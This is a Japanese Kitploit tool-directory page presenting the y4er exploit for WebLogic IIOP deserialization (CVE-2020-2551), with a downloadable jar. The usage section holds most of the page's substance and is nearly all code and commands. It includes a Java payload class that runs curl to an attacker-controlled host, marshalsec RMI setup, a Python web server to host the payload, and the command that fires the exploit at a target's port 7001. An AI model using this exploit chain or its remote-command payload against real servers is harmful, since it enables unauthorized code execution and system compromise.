Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
ツール/GitHubGitHub/y4er/cve-2020-2551
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツールペイロード開発
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

リポジトリを見る
3367826年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-2551

Weblogic IIOP 逆シリアル化

テスト環境

Weblogic10.3.6+jdk1.6

パッケージ化されたjarファイル 抽出コード:a6ob

脆弱性の悪用

jarファイルをダウンロードし、marshalsecを使用して悪意のあるRMIサービスを起動します。ローカルでexp.javaをコンパイルします。

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

WebLogicと同じJDKバージョンと依存ライブラリ(wlfullclient.jar)を使用してコンパイルすることを推奨します その後、ローカルでWebサーバーを起動します。

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

コマンドラインでjarファイルを実行します

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

実際の動作は以下の通りです image

既知の問題

多くの方が再現に失敗したと報告しています。ネット上の記事を見ると、IIOPにはNATモードの問題があることがわかりました。本日、先知(Xianzhi)に https://xz.aliyun.com/t/7498 が掲載されましたので、各自ご確認ください。

参考

https://y4er.com/post/weblogic-cve-2020-2551/

ツールをダウンロード